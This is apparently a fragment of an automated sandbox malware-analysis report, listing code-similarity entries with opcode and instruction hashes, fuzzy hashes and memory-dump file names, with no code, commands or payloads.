                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A011AAB14C121BE7141C5437B29AFF67AEE5C2B70770C427FC06D6801E29A4E9E5175
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1778093687.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: afedbd86a6ec4bce8fdae7e679d317eb84132016490f07c527bbbbd28dea9973
                                                                                                                                                                                                                                                                                                              • Instruction ID: e840824b68efaf8fb032f1d868875f0698b288e41d4b78755caec5b9a08c2b83
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: afedbd86a6ec4bce8fdae7e679d317eb84132016490f07c527bbbbd28dea9973
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD012CAB14C121BEB142C5437B299FF676EE5D2B30730C827F846D5402E29A4E9E5175
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1778093687.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: f2e8d00bf5e950fe203a5ebb1d2302a2769be58826a8fbb8bbd2d1f989ef7ad9
                                                                                                                                                                                                                                                                                                              • Instruction ID: 4dc33ba17e36fa579dd35ea08acebf74f89e99b8dd4ef0893e76d292f496aa1f
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2e8d00bf5e950fe203a5ebb1d2302a2769be58826a8fbb8bbd2d1f989ef7ad9
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3501DEBB10D154BEB201C196BB2CAFFB779E6C1B30730882FFC42D6006D2590A9D9172
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1778093687.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 3ebf6daa6fb83a53277d1ce198dbe9c80595e4c976fdf80971744063268a58bd
                                                                                                                                                                                                                                                                                                              • Instruction ID: 3b38db6b6d78853f092fd32102847ae1bcdcea3e1e5f1028b81296013958d7b6
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ebf6daa6fb83a53277d1ce198dbe9c80595e4c976fdf80971744063268a58bd
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68F0C2B725D061ADB182C5927A79AFF6B9AE5C1730334885BF842C8406D1490E8F9176
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1778093687.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 8a926d6fc5af0503ca6a2f3bf44bed836cb873790dd3c3ec62b8a0e40e79b400
                                                                                                                                                                                                                                                                                                              • Instruction ID: a0c2269ef13282e56c163c04f44571870aba30f46fa8a4bd364951826f0e1fde
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a926d6fc5af0503ca6a2f3bf44bed836cb873790dd3c3ec62b8a0e40e79b400
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1F030FB10D161ADF241C5823B29EFF636ED5C5734731C46BFC82C4441C64A0A9E9276
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1778093687.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 215b59d6cbed781bf744b25eb50e7298dd8bb5a5f153ca5a7c0602368d8bd3df
                                                                                                                                                                                                                                                                                                              • Instruction ID: ce116f60f6574c4e4465e1dca2331599c7395d03759c65a024aa4d210f1a1465
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 215b59d6cbed781bf744b25eb50e7298dd8bb5a5f153ca5a7c0602368d8bd3df
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8BE04FBB25D114EEB050E5927B28ABF73ADE1D03303708927F892D4441C25909CE9636